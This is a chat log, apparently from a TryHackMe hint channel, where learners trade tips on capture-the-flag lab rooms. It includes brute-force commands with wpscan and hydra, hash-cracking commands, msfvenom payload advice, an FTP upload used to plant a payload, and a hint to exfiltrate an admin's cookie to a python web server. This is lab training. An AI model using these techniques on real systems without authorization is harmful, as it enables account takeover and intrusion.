Have you checked with something like smbmap or enum4linux?
#room-hints
void lava
isn't it \\ not //
white salmon
same thing
I don't see why i can't if there is a guest user
Try doing that without the -L flag
Ahh it worked thanks π
That's because the "-L" list the services available on the server not the content of directories
ahhhhh lmao thanks for that
Okay im a little confused i got 2 pictures of dogs exiftool found nothing. ftp anonymous login had 3 files one being a bash script that doesn't seem to do much?
Well you got 3 files
right
A bash script and another one significant
Bash script + another file is the solution to get a foot on the machine
i don't understand
Read the bash script
What it does?
its checking for files in tmp and and deleting them and writing its log into a directory
And the other 2 files what they do?
nothing there just text files
There you are wrong
They are telling you something important
That combined with the bash scripts helps you
brain fried
I won't say much further here. If you really do not understand try to read the write ups. Thou I suggest to not take this easy path and to try to solve it yourself
thats what ive been doing rather figure it out
Is there a way to edit the script on an anonymous ftp?
Then (don't know what time is at your position, by me is 02 AM) try to take some sleep and maybe come back on the machine tomorrow with new ideas ;)
oh no no. no time to sleep
Oh wait can i upload files to ftp anonymous?
What do you think?
Yes?
FTP= File Transfer Protocol
duh ahaha
im go try upload some payloads or something
π
bruh figured it out
how do i upload it?
hollow maple
curl -T /path/with/thefile.ext ftp://ipfromftp/path/to/thefile.ext (e.g)
hollow maple
?
white salmon
hollow maple
Did you try Ctrl + C, right?
white salmon
yeah but i ment everytime i use gobuster it happens
hollow maple
While gobuster still running?
white salmon
thats the output from gobuster
hollow maple
I mean, you type: gobuster dir -u .... enter and already get this?
white salmon
yeah
white salmon
nothing it will just go to the end
hollow maple
Well, how can you use it if it doesn't work? π
hollow maple
Are you still connected to THM?
hollow maple
Try using wfuzz
white salmon
im not sure how to use wfuzz
hollow maple
wfuzz -w wordlist -u url/FUZZ
hollow maple
Are you able to access the site normally?
white salmon
yeah
hollow maple
Burp or ZAP Proxy is running bg?
white salmon
no nothing
oblique cliff
Which room is this
white salmon
Arrowverse
hollow maple
white salmon
fail2ban?
white salmon
me?
oblique cliff
Yes
white salmon
stuck fractal
The room is called Lian Yu.
hollow maple
nmap still working?
stuck fractal
!vpnscript
proud scarabBOT
TryHackMe
white salmon
yeah nmap works okay sometimes it doesn't and i have to use -Pn
stuck fractal
That sounds like a suspiciously broken VPN unless you're scanning a windows machine
white salmon
how?
i only have one terminal running my config
it just killed my connection to openvpn lol?
wait im still connected some how wtf is happening
your suppose to have sudo openvpn config.opvn right
i don't know whats happened but it worked thanks i can now scan
hollow maple
Well, you live and learn always!
oblique cliff
i don't know whats happened but it worked thanks i can now scan
@white salmon you had multiple vpns running
The script killed all your vpns you had running and then started up the one youβre supposed to have running
white salmon
but how if i only have one running in my terminal now nothing is running in any terminals yet its connected
oblique cliff
Always good to understand whatβs going on π
but how if i only have one running in my terminal now nothing is running in any terminals yet its connected
@white salmon it probably backgrounds it
ps -aux | grep vpn
Run that
Show the output
white salmon
what does -aux mean
oblique cliff
white salmon
cheers my output is
stuck fractal
@white salmon When you want to disconnect from the VPN, control C in the terminal where it's running and wait for it to shut down properly. Don't close the terminal as this often just backgrounds it.
oblique cliff
@stuck fractal 
white salmon
white salmon
@stuck fractal i haven't done that. i just leave it open and click onto the next ctf
oblique cliff
That explains why you had multiple vpns going then
white salmon
why?
oblique cliff
i haven't done that. i just leave it open and click onto the next ctf
@white salmon
white salmon
im i suppose to close and reload every ctf?
stuck fractal
No.
white salmon
all i do is run the command once thats it
also could i get a small hint on Juin ctf task 1?
so far I've found the page username have a bruteforce running for the ssh and ftp while searching more directory's
lyric oasis
box: thompson
running tomcat...
tried default credentials and path traversal didn't worked
last trellis
Box: Cicada-3301 Vol:1 having an issue in task 5
any help with the command "outguess -r welcome.jpg ans.txt "
Reading welcome.jpg....
Extracting usable bits: 29049 bits
Steg retrieve: seed: 53476, len: 22525
Extracted datalen is too long: 22525 > 3632
getting this warning and nothing is printed
eternal brook
box: thompson
running tomcat...
tried default credentials and path traversal didn't worked
@lyric oasis have you tried reading the page you get when you enter wrong credentials?
lyric oasis
@lyric oasis have you tried reading the page you get when you enter wrong credentials?
@eternal brook yup π€
got it
but when brute forced why didn't shown the creds @eternal brook
lyric oasis
restarted machine now I'm not able to login
nimble badge
Can I get a big hint for the chellange in the room graphql?
eternal brook
restarted machine now I'm not able to login
@lyric oasis what creds are you using? It's clearly mentioned in the page just login with those creds
lyric oasis
it worked after i rebooted my local system
π€¦π»ββοΈ
thanx man @eternal brook
eternal brook
Cool np, please delete that credentials message @lyric oasis
lyric oasis
Cool np, please delete that credentials message @lyric oasis
@eternal brook done
my last question ... why bruteforce not worked on login @eternal brook
π
eternal brook
Bruteforce depends on what wordlist you're using I'm not sure if those creds are there in rockyou.txt also you need to know the username, bruteforcing both username and password is not a good idea.
Which wordlist you used for username and password?
lyric oasis
i used tomcat default credentials list using metasploit
eternal brook
Are those creds available in that wordlist?
lyric oasis
yes
eternal brook
Can you share your hydra command?
eternal brook
Oh there can be various reasons for that not working wrong settings of the module or it might not be the right module π€·
Lemme check it giveme 5 min
lyric oasis
ok π
eternal brook
Can you send show options ss?
lyric oasis
screen shot?
eternal brook
Yeah
lyric oasis
one min
eternal brook
Also link to the wordlist you're using
eternal brook
It's working now?
frail rain
Any hints on HiddenFlag in PostExploitation Basics.
Part 1: PowerView
lyric oasis
It's working now?
@eternal brook nope
eternal brook
Ok strange idk mayn never used Metasploit for that bruteforce ..... hydra with that wordlist should have worked fine
lyric oasis
Ok strange idk mayn never used Metasploit for that bruteforce ..... hydra with that wordlist should have worked fine
@eternal brook yeah it's weird
lyric oasis
hydra also didn't worked
stone oyster
Morning everyone
steady ridge
everyone i dont understand this task
late patio
what room is that?
stuck fractal
Zthlinux/Learn Linux
late patio
@stuck fractal You really never sleep. lol
stuck fractal
You just don't see me sleep
late patio
@steady ridge What have you tried so far?
stuck fractal
If a tree falls in the forest and no one is around, does it make a sound?
late patio
@stuck fractal Facts.
oblique cliff
You just don't see me sleep
@stuck fractal ~~I do ~~
:R1_60: everyone i dont understand this task
@steady ridge escalate your privileges to root so you can read the flag
late patio
@stuck fractal Have a good one. I told you I would try to pop in more often. π€·
white salmon
Hi,guys.Can you give me some hints about overpass-1
median compass
you need to be a little more specific @white salmon, that's not really how hints work... what have you done, what are you stuck on? use spoiler tags (surrounding the spoiling part with ||) where necessary
white salmon
@median compass okay,thanks a lot
white salmon
@steady ridge you need to get your hands on the root.txt n submit the contents of it
simple phoenix
Hi, in OWASP room task 19, the hint says to look at the source code to look for default credentials, so do I understand well that I need to look at the website's code in the Debugger?
white salmon
@simple phoenix Nope - Right click on web browser page and select "View Source" to see the HTML/CSS code etc..
I've not done the task, but does it suggest using Burp Suite at all to view the GET / POST requests?
simple phoenix
actually it ended up being somehting entirely different but I did Git it
rough nimbus
anyone else has a problem at metasploit on task 5?
astral smelt
What's the problem with it?
astral smelt
Could you show a screenshot of your options please
astral smelt
Wrong LHOST
rough nimbus
then what should it be?
astral smelt
Type ip addr in your terminal and look at the tun0 ip that is your LHOST
fleet pike
Back to the MITRE room. Task 4, Section 3. "For the above analytic, what is the pseudocode a representation of?" .. I am still not getting what they are asking for. I cannot figure out how to get a pseudocode from the tactics list under the tactic. I know the category is marked as ||Persistence|| but i cannot find any pseudocode for it, I do find pseudocode for 17 items under that tactic, but the question does not seem like it's geared towards a specific entity rather the tactic as a whole.
astral smelt
It took me a while for this one but it's actually in the task and it's right in front of you but you don't realise it
fleet pike
Oh geeez
My issue was I could not figure out if they were referring to the previous question, or something else.
Thinking about a better way to phrase that question, feedback time
remote gate
@fleet pike saw this and wondering how you would reword that question so the objective is more clear. thanks
fleet pike
@remote gate The confusion is that a different question is asked .. changing tactics and whatnot.. then you decide to switch back to discussing the example text. I'd probably cite "In the example analytic above, ...
Or in the example above
As opposed to above analytic (after that other question. its hard to mentally switch back.. and you end up going on a treasure hunt on CAR's website
alternately, you can switch the order
Make that question the higher one so you are still thinking in terms of the example, and then you switch gears and go to car's site
last trellis
Psycho Break : task 2 how i can free from laura
hasty gust
Can anyone help with the CSP room? Stuck on this question: What directive-source combination should we add to our policy if we want to specifically block all JavaScript content from running on our website?
last trellis
@last trellis Run!
@hollow maple saw shell and did relative path took me half hour even after writeup hint
open storm
Hello, I am stuck at the Blue Steel Machine... I am not sure if it's a bug or what I am doing wrong, I checked three different write ups, and I followed correct steps, but I keep getting error at the Task 3 during Privesc.
The error:
RROR: Start-Service : Service 'Advanced SystemCare Service 9 (AdvancedSystemCareService9)' cannot be started due to the
ERROR: following error: Cannot start service AdvancedSystemCareService9 on computer '.'.
ERROR: At line:1 char:1
ERROR: + Start-Service AdvancedSystemCareService9
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
ERROR: ServiceCommandException
ERROR: + FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
ERROR:
Not sure if this is correct place to ask though...
white salmon
show a screenshot please
open storm
As you can see, meterpreter session opens for a while, but it closes in like half a minute, with an error which says "reason: user exit"
astral smelt
Try sc qc
open storm
stuck fractal
Generate a exe-service payload in msfvenom
Make sure your set payload in multi handler is exactly the same as your generated one
hollow maple
saw shell and did relative path took me half hour even after writeup hint
@last trellis The first time I got stuck after I found this out, but I got a hint and this saved me π
open storm
Created the payload
Same error...
I did the same thing but manually and I receive the same error
strong tinsel
Room : Relevant, Found the creds from smb enum, tried rdp, eternel blue and stuck. Any hints?
@open storm reset the box and try again
open storm
I tried that as well... well I'll try again and see
astral smelt
It could be that you're using msf6
astral smelt
It's unstable
I'm not sure if it's gotten better tho but from what I've seen it's known as unstable
stuck fractal
@open storm exe-service payload
That's the -f format argument
-f exe-service
The payload you set in multi/handler and the payload you're using don't match either
They neeeeeed to match
open storm
well the payload does match... but I changed the "-f exe-service" and it works now
thank you for the help!
quaint patrol
Hello, someone can help me for the scripting room task 2 ( [Medium] Gotta Catch em All )
urban wraith
Hi, can somebody help me with marketplace ? I can easily get ||my own cookies|| but not ||admin's cookie|| no ideas what I am doing wrong
remote gate
@urban wraith have you tried starting a web server with something like the python http.server module and sending them?
dusk violet
@hasty gust if you are stuck there you'll get mad once you get to the CSP Sandbox π
one of the sources says exactly what they are asking for..
one source fully disallows loading resources of the specified directive type from anywhere....
that's the one you need to use under your script sources policy
urban wraith
@remote gate, yes I have a python web server running. It works and I can retrieve the ||cookie for the user I created. || But then, I get nothing when I ||report the listing I created with the payload inside||
remote gate
@urban wraith could you pm me what you're trying please?
karmic sky
Would anyone by chance be able to give me a nudge on
https://tryhackme.com/room/mitre ; Task 4: CAR Knowledge Base
Q: For the above analytic, what is the pseudocode a representation of?
I've tried searching for the pseudocodes of both the cAR-2014-004 and 2020-09-001 but neither of the pseudocode representations appear to be valid when I try them unless I'm misunderstanding something
jovial sentinel
Room: Network Services
Task 4, Question 4
I have to look around for any interesting documents that could contain valuable information. The ls command is working and I can see a "Working from home...txt" but I can't see what it contains π¦ . I have tried cat, tail, vi, vim, nano, head, less but I keep getting command not found. Could you give me a little hint?
karmic sky
you'll want to research into how you can go about getting it onto a system that does have those commands π
jovial sentinel
π€ ok. I'll try this. Thanks
median compass
when connected in smbclient there is a help command @jovial sentinel that shows you all the commands that will work there
karmic sky
^
fleet pike
@remote gate did that help you any?
median compass
@karmic sky, look at the CAR-2020-09-001 link again and re-read what it says about the psuedocode
fleet pike
@jovial sentinel There are some commands that can be multipurposed.. These commands are inherent to all shells, and they have so many uses.. For example. echo .. learn how to use echo properly
remote gate
@fleet pike yeah that makes sense. i think moving that question up one will clear the confusion. ill message the creator with the feedback. the reason why i was asking is I tested the room and try to look for stuff like you brought up
fleet pike
Did you get tripped up as well?
remote gate
i didnt on that one but now that i see it again i can see how
fleet pike
@jovial sentinel For example echo "Anarchy rules" ... but it can be used in place of Cat, Ls, "erase", "write" .. you can redirect data from it to other things or objects, and from other things or objects to echo.
karmic sky
..<
fleet pike
I wasn't sure if room hints was "Point them in the right direction" or "give them a working comparable syntax"
remote gate
thanks for the feedback @fleet pike. i messaged them. this obv isnt my creation so it'll ultimately be up to them to make a change. ill try to keep something like this for the next room i test
karmic sky
Hints should always be more focused on ways that one can search for their own answer, or how to fish so to speak
fleet pike
@remote gate I think honestly that just movign the question would be the path of least resistance. I still hav ea few more questions on this one i have been hitting the wall on
karmic sky
As I understand it
median compass
speaking of which, did you get it @karmic sky?
karmic sky
I did, the question is a tad confusing since it mentions "The above analytic" when it's referring to the first analytic on the page
I thought I was going insane but it'd been right there the whole time
jovial sentinel
I managed to get the content of the file with one of the available commands. In the meantime, I've been familiarising myself a little more with echo command and it is pretty interesting but I still can't actually read the content of that file using echo
I mean, I wanna try this just for fun/learning purposes
I have tried something like this: echo "$(cat Working\ From\ Home\ Information.txt)"
remote gate
@fleet pikehe swapped the question. thanks again for the feedback
fleet pike
Nice π
jovial sentinel
I'm assuming this is showing me how to properly use that command but...I can't make it work 
median compass
typically with smbclient the easiest thing to do is transfer the files to your attack box where you can do what you like with them @jovial sentinel
jovial sentinel
typically with smbclient the easiest thing to do is transfer the files to your attack box where you can do what you like with them @jovial sentinel
@median compass ok, this is new. I noticed that the last question of this task is to transfer that file to my machine. I'm working on that π
median compass
enjoy
limber iron
Any hints on the enum part of year of the owl
median compass
too soon for hints on yoto, 72 hours from release means nothing till 8pm GMT tomorrow
limber iron
Ok buddy
jovial sentinel
managed to get the id_rsa on my machine. gave enough permission with chmod. why does it says invalid format? π¦
median compass
which room is this @jovial sentinel?
jovial sentinel
Room: Network Services
Task 4, Last question
median compass
where did you get the username for the account from?
don't worry about the format for now, check your other parameters are correct
stuck fractal
@jovial sentinel you can get that error even when the key is valid and lets you in. Ignore it.
jovial sentinel
where did you get the username for the account from?
@median compass it is said in one of the questions above
stuck fractal
That's the user for SMB
jovial sentinel
oooooh, right
stuck fractal
Unix usernames are always lower case.
median compass
so what's happening is that you're asking it to authenticate with that key against a user that doesn't exist, that's why it's not going any further
stuck fractal
*key
jovial sentinel
so what's happening is that you're asking it to authenticate with that key against a user that doesn't exist, that's why it's not going any further
@median compass yeah, I knew that but I messed up thinking Anonymous is the user.
Now I solved it by trying "combinations" with the name I got from a previous question. Is there any other way to find the name or I did the right thing getting his username from that letter?
median compass
no, that's often the way, an educated guess based on what you've learned from enumerating
jovial sentinel
Thanks and Sorry for bothering with so many questions but I want to learn everything properly π
median compass
no problem, that's how you learn
maiden kite
hi there, i'm in room Blue task 4 question 2
the goal is to find the password from a hashdump
i've tried to separate the hashes and run it through hashcat (hashcat -m 0 -a 0 myfile.txt rockyou.txt)
tried not moving a thing and run it trhough john the ripper (jophn --rules -w=rockyou.txt myfile.txt / john --show myfile.txt)
but i can't seem to crack the freaking passwords π
... could you help me?
fleet pike
@maiden kite did you figure it out?
@maiden kite make sure that you are specifing the right hash algirthm type via your cracking app. Do you know what the right one is for ntlm?
rigid dagger
I need some help with the room "Jack"
I cant brute force the wordpress user. My wpscan crashes everytime after a couple of minutes
white salmon
show a screenshot please
rigid dagger
It says "Scan aborted: invalid byte sequence in UTF-8". So its a problem of my wordlist right? But its rockyou xD i mean....
white salmon
show a screenshot please
rigid dagger
white salmon
and your command?
rigid dagger
wpscan --url=http://jack.thm/ -U users.txt -P /usr/share/wordlists/rockyou.txt --password-attack xmlrpc -t 1
-t 100 sry
Or am i using too many threads?
white salmon
wpscan --url http://jack.thm/ -t 3 -P /usr/share/wordlists/rockyou.txt -U users.txt
rigid dagger
Ok ill try that. But it will take hours....?
white salmon
try to use a shorter wordlist
white salmon
try fasttrack.txt
fiery moth
@rigid dagger do some enum first to find out some usernames ig idrk
rigid dagger
I found the 3 users ty
rigid dagger
thanks @Rick Next time ill stage my BF attacks starting with smaller wordlists and increasing them π
narrow barn
Any hints on the initial foothold for year of the owl? π
narrow barn
Ohh.. didn't notice, cheers π
maiden kite
@fleet pike nope, i'll have to read a little more about it :)
Thanks!
spring tartan
I'm doing "CTF collection vol 1 - Task 17 - A sounding QR" where I have to listen to a soundfile playing the flag. But I just can't understand all the letters that is being said. Anyone with a tip on how to understand all the letters ?
woven mirage
If you want, send the audio to me in a dm and I'll tell you what it is saying
Try to play it slow motion
Maybe it will be easier to hear
spring tartan
I only have the link to the website, where it is playing. Not the actual file it self
woven mirage
Send me the link
spring tartan
I just did. Thanks
stone oyster
well, that sucks. My subscription ran out and all that work on the Linux Challenge room is gone.
stuck fractal
well, that sucks. My subscription ran out and all that work on the Linux Challenge room is gone.
@stone oyster It's not gone.
stone oyster
well, I can't access it until I resub
white salmon
could i get a hint on nmap T1? i tried googling but nothing
actually nvm im an idiot
fallow sapphire
Yo my fellows Hackers
Need some hints for mrrobot
Key 2 !!
I modified font color of page and another stuff but nothing ...
oblique cliff
Try to get access to the Wordpress site @fallow sapphire
fallow sapphire
Try to get access to the Wordpress site @fallow sapphire
@oblique cliff okay , so let's bruteforcing login page with the "fsocity"
white salmon
Which category in metasploit help is this under?
"How do you show options in a specific category"
oblique cliff
@oblique cliff okay , so let's bruteforcing login page with the "fsocity"
@fallow sapphire first find out a valid username
Then yes, but you can make it much faster π
fallow sapphire
Which category in metasploit help is this under?
"How do you show options in a specific category"
@white salmon show options is for help π
white salmon
wot
no like how do you show options in a specific category
like which category would it be in under help in msfconsole
fallow sapphire
Then yes, but you can make it much faster π
@oblique cliff User found !!! Password lefts ...
oblique cliff
π₯³
white salmon
i just went through entire help for metasploit n nevr found anything about this
How do you show options in a specific category
fallow sapphire
i just went through entire help for metasploit n nevr found anything about this
@white salmon Category ... Exemple??
stuck fractal
Modules have options
the payload is one of those
The payload then has options as well
fallow sapphire
So if you choose the element, payload for Exemple , you have to run show option ...
white salmon
could i get a hint on t2 fsociety
fallow sapphire
could i get a hint on t2 fsociety
@white salmon mrrobot room ??
white salmon
yeah
fallow sapphire
yeah
@white salmon did you find the right login ?
white salmon
no i have the dictionary. but no username im entering random logins onto forgot password now
fallow sapphire
no i have the dictionary. but no username im entering random logins onto forgot password now
@white salmon So bruteforce first for finding right Username then password
white salmon
you can do that?
fallow sapphire
you can do that?
@white salmon yeah try with burp
white salmon
not sure how with burp
fallow sapphire
So pick your best toolπ π
white salmon
hmm okay thanks
white salmon
lord have mercy
fallow sapphire
lord have mercy
@white salmon wowπ what tool ?
fallow sapphire
i don't have burp pro to load a list
@white salmon no need burp pro , i use burp community
white salmon
not working for me
fallow sapphire
not working for me
@white salmon some misconfiguration i think
narrow barn
Year of the owl, drives me mad, cannot see anything obvious, any hints? I hope it's not bruteforcing and fuzzing, I don't like it
trim haven
Hints are up to @inland onyx
frail rain
i think hints are disabled till next week? idk
inland onyx
Give it a few more roots
Not least because there are about three people plus myself capable of giving them
Year of the owl, drives me mad, cannot see anything obvious, any hints? I hope it's not bruteforcing and fuzzing, I don't like it
@narrow barn You do not have to bruteforce that webserver
Or the DB, for that matter
frail rain
Muir i cannot stream that room in Discord right>
inland onyx
Not yet, please
inland onyx
Give it until Friday
The writeup probably won't be out then, because not enough people have finished it
frail rain
not even gained user ahaa.. but yes!
inland onyx
But nothing stopping you streaming it then π€·ββοΈ
narrow barn
@inland onyx hmmm, ok will try to think of something, thanks! π
frail rain
ill try my best to get atleast a shell this week
inland onyx
Enjoy!
orchid root
Hi there is a room names sublist3r
There is no writeup for that room
And I m having only one question left
trim haven
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
orchid root
I m on room : sublist3r
Stuck at tast : 4 scans away!
We have to run a sublist3r scan here and I did it successfully
And after that after trying to look at writeup and also searching on Google I was not able to look for the valid answer for question number : 5
hollow maple
There is no writeup for that room
@orchid root
||https://www.youtube.com/watch?v=yXppnZZxkPg||
π€
white salmon
room: https://tryhackme.com/room/rppsempire
task 8: question: What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?
It is not ||T1059|| Can someone give me a little hint pls.
i already used google. but i always ended up at ||T1059||
lime verge
I have a question about the Food KoTH. I've already found all entry points and all privilege escalation techniques. I want to know how to patch the ||telnet ROT12 password which is in the description/header of the service when running it; before putting the user and password id|| I kept looking for a configuration file but I cannot find anything
stuck fractal
Change the password
There is a configuration file for it, I think it's one of the MOTD files?
fallow sapphire
π₯³
@oblique cliff what tool have you use for Bruteforcing ?
stuck fractal
@lime verge /etc/motd, 99% sure
oblique cliff
Wpscan
lime verge
Thanks for the answer π Yeah changing the password is the reasonable thing to do. There are a bunch of motd files but I cannot rly be bothered looking at all of them. From an easy patch perspective, changing the password is the best way to go
lime verge
/etc/motd is not there and /etc/issue has something else
Does not matter really I'll stick with the obvious one
cedar axle
@white salmon something about defacing?
fallow sapphire
Wpscan
@oblique cliff okkkk
terse moss
@white salmon If you open the module in Starkiller it will tell you which MITRE ATT&CK technique the module uses
flat granite
help! can I have a hint for room NIS -linux part I task 9 "xargs" please ?
remote gate
@flat granite what do you have so far?
remote gate
@flat granite no worries. thats reallyy close. just missing the very end
dusk violet
@flat granite why are you using /bin/xx ?
dusk violet
π€£
remote gate
anytime π
dusk violet
@flat granite btw, when you get to wget task just ignore the ** to build your command...there is a typo. just do your research and put the command you'd use π
flat granite
thank u @dusk violet!
grizzled berry
Is there a way for me to bypass Permissions held by root?
It says that my login has permision to execute a command that I need to use, however it says Permission denied
white salmon
which room
grizzled berry
Linux Challenge, Task 4, Question 8. Looking for Flag27
white salmon
did you check which commands you can run as root
grizzled berry
yes i've tried sudo -l and this is what gets returned:
||```User alice may run the following commands on ip-10-10-163-214.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27
so you can cat a file
grizzled berry
yes, however when I try to cat the file it tells me Permission denied
white salmon
did you try sudo nano
grizzled berry
I have not, ill check what it does to get a better understanding, perhaps I overlooked nano
white salmon
sudo cat I mean
grizzled berry
Oh yes, I have, but that returns this as well:
Sorry, user alice is not allowed to execute '/bin/cat flag27' as root on ip-10-10-163-214.eu-west-1.compute.internal.
white salmon
show me your command
grizzled berry
Matching Defaults entries for alice on ip-10-10-163-214.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on ip-10-10-163-214.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27
alice@ip-10-10-163-214:/home$ sudo cat -n flag27
[sudo] password for alice:
Sorry, user alice is not allowed to execute '/bin/cat -n flag27' as root on ip-10-10-163-214.eu-west-1.compute.internal.
try sudo cat /home/flag27
grizzled berry
that worked!
If you have the time could you explain why that worked but just catting the file itself didnt?
white salmon
i'm not sure
grizzled berry
all good, thanks for the help, ill most likely be back soon
I've returned, im now on Q10, i've removed all the spaces and newline spaces. what should I do to split by comma and get the last element in the split?
devout seal
Can someone help me on Linux Challenge Task#2 Q8? I tried to ||tar --unzip flag8.tar.gz|| but it isn't working for me. Am I missing something?
white salmon
wrong command @devout seal
hasty slate
have we started giving YOTOwl hints? @inland onyx
inland onyx
@hasty slate nah, give it a few more roots. I'll field some vague ones though
hasty slate
okay sure.. ppl are dm'ing me actually. (let's ignore rule 1 for a bit lol)
white salmon
@white salmon If you open the module in Starkiller it will tell you which MITRE ATT&CK technique the module uses
@terse moss Thank you for the hint.
narrow barn
YOTO... I think I know what I need to do to get initial foothold, tried few things, didn't work .. not sure what to use because of lack of information π³οΈ
fair zodiac
I can see the service as 'http' but the answer format is a bit lengthy, couldn't get around this ..Any hints?
normal forum
you're very close π
normal forum
http is a protocol, if you had a daemon though
does that hint make sense? I just woke up lol
fair zodiac
Oops I got it Haha ! Thank you π
stuck fractal
If you have the time could you explain why that worked but just catting the file itself didnt?
@grizzled berry Sudo permissions are very specific. The sudoers entry specifies you can use /bin/cat on the file at that location by full path so you need to use the full path
grizzled berry
@stuck fractal That makes sense, thanks!
lyric oasis
box:anon force
got user flag. via ftp.. bruteforced ssh.... no results....
mild eagle
room: introtoexploit missing one question tin task 4 question 3 What data type does the payload need to be? need a little hint tried bytes, json and so on but doesn't match the hints "*"..
limber iron
yoto root part ?
median compass
if you read the text above regarding writing the exploit, it tells you how the five random alphanumeric characters are stored @mild eagle
I think muir want's to leave hints on YOTO for another little while @limber iron, perhaps talk to him directly for a nudge?
limber iron
okay thank you budddy
grizzled berry
I need some help with the Linux Challenges room, T5 Q5. Having trouble finding were my personal $Path is stored
wintry yarrow
echo $PATH?
median compass
try a google @grizzled berry "linux setting environment variables"
mild eagle
if you read the text above regarding writing the exploit, it tells you how the five random alphanumeric characters are stored @mild eagle
@median compass ha ha tnx was so focused on the data part tuples and so on.. π
grizzled berry
i've finally made it to the last question of Linux Challenges. I'm supposed to find which person is apart of a hacker group, which I did, but now I don't know what to do with that information
median compass
try looking for files that such a person might own @grizzled berry
grizzled berry
thanks @wintry yarrow @median compass @white salmon and everyone else that helped me
im getting an unhealthy addiction to completing these rooms
wintry yarrow
I don't know where I helped but you're welcome.
lyric oasis
did you fully enumerate ftp @lyric oasis ?
@median compass yup..... searched all files
oblique cliff
You were moral support
grizzled berry
i've been doing this room for a long time and I remember you helping at some point
but yes I appreciate the moral support
wintry yarrow
Np, happy hacking! 
median compass
and did any of those files seem useful @lyric oasis?
lyric oasis
and did any of those files seem useful @lyric oasis?
@median compass the .wget-* file sus
median compass
screenshot maybe @lyric oasis?
lyric oasis
can i dm @median compass
median compass
sure
lyric oasis
@median compass i was like idoit searching only home dir , but it was in root
cracked it and got the pass
median compass
that's a bit of a spoiler @lyric oasis, perhaps surround the solution part with || tags ok?
and well done
sorry achoslav, your nick comes up first when typing @ proxy
silk nexus
Can I get a hint for the bonus tast in the learn linux room?
wind peak
greetings everyone. linux challenges task 2 Look at the systems processes. What is flag 7. I am stuck here. May I get a hint please?
woven mirage
Can I get a hint for the bonus tast in the learn linux room?
@silk nexus take a look at the files owned by each one of the users
woven mirage
greetings everyone. linux challenges task 2 Look at the systems processes. What is flag 7. I am stuck here. May I get a hint please?
@wind peak take a look at ps manual page and see how can you show all the processes in the system
wind peak
ps -e
looking at them i still dont get it
or ps -A
same thing
maybe im burnt out or something
wind peak
ps ax
okay
gonna lookup what that x flag means
thank you
Just a general question here not aimed at any specific room. Are we expected to use google sometimes?
median compass
you're expected to use google ALWAYS π
woven mirage
google is our friend
wind peak
thank you i love google
white salmon
ps aux @wind peak
the x lists all processes that don't have a TTY associated with it
The a displays all processes running
The u shows more details about the processes
wind peak
Thank you @white salmon
wind peak
Im stuck again ppl. Tried looking in etc for motd and its not in there. i did however find a cool text that says try hack me. Can anyone tell me where MOTD's are usually stored?
please?
okay
dont worry to answer
i found it
i think i need a break lol
orchid root
Hi I m doing room : printer hacking 101
And stuck at task 3 : I have deployed the Machine but still the script isn't able to find the machine
orchid root
They asked to use script : pret.py
the script is to discover prints on your network
@woven mirage yes
woven mirage
the room teaches you how to use it but in this situation you already have the ip of the printer
orchid root
But as I have deployed the machine and connected using vpn! Still I m not going to see a printer in it??
woven mirage
you deployed a machine
the machine is the printer
you dont need to discover printers on the network, you already got a printer deployed for you
you need to visit MACHINE_IP:631
orchid root
Wow I got it thanks! I thought the script will find that deployed printer π
wind peak
i have another question. i plan to go through all the learning paths. will i be able to do bug bounties after that?
i honestly want to make a career out of hacking
woven mirage
i don't think bug bounty is something that you can make a carrer out of, it depends a lot on luck
also, i think this question would be more apropriate in #cyber-and-careers π
wind peak
Thanks @woven mirage
silk nexus
Hey all, I am stuck on flag 16 of linux challenges
I am confused about the system mounts as I have searched through the typical ones such as /run /dev/ proc /sys
orchid root
Hi ! In printer hacking room
I m not able to make ssh connection I don't know why I have typed every command correctly
grizzled berry
On room Common Linux Privesc, T6 Q3. I've inputted the command that it told me too and I get spit out a hash, but the problem is that when I try to put it in as an answer it tells me its wrong
white salmon
what hash did you get?
grizzled berry
|| $1$new$p7ptkEKU1HnaHpRtzNizS1 ||
thats the whole line im being returned
im assuming that whole line is the hash
white salmon
yeah correct
grizzled berry
you see Rick, I don't know what kind of wizard you are, but when I put it in to confirm that it was wrong like all the other times, it worked.
trail palm
Check for extra spaces up front and back like I said - sorry for the confusion.
grizzled berry
all good Lars, for some reason whenever I put it in before it didn't work, but once I asked for a hint, it suddenly works. I'm really not sure what levels of stupidity im running on right now
im running rooms at 4am
grizzled berry
I don't know why I get the motivation to run rooms at this time of day
trail palm
Probably the dark and switching console to green text is what does it
grizzled berry
I'm using PuTTY with an OpenVPN connection because the attack box gives me lots of trouble, I have yet to change the color profile
trail palm
That's dedication, I just run a massively overprovisioned Kali VM myself
jovial sentinel
Room: Blue
Task 3
I am trying to run the exploit from the below screenshot and I can't make it work. I have tried to redo all the steps from the beginning and still no success π¦ Any hints please?
and these are my options:
wintry yarrow
You already have meterpreter shell I think.
jovial sentinel
yeah, I have, but it is from a previous task
and I put that shell in background with ctrl+z and now I have to follow the rest of the room but I m stuck there
wintry yarrow
You already have meterpreter shell so no need to upgrade it.
past night
so, you need a normal shell in order to elevate it to meterpreter, a meterpreter is the highest you can get @jovial sentinel
if you want to use that module you need to change the payload to a different shell other than meterpreter, which will then allow you to use the module in the screenshot, does that make sense?
jovial sentinel
actually, yes. I have watched the video available in the beginning of the room and I noticed the differences and your responses really made me completely understand. Thank you guys 
past night
no worries π
you can also use the metasploit unleash course to get a better understanding of metasploit if you want to
jovial sentinel
I will definitely do this. I find Metasploit really interesting and I think it would be really helpful to know this better π₯°
past night
yup, that's the most documented you can get for free. Other paid alternatives are from SANS with the Metasploit Kung-Fu or something like that
jovial sentinel
well, the Metasploit room from here was quite helpful as well π
given the fact that I am a complete beginner and (until now) I only heard of Metasploit, it gave me some nice information π
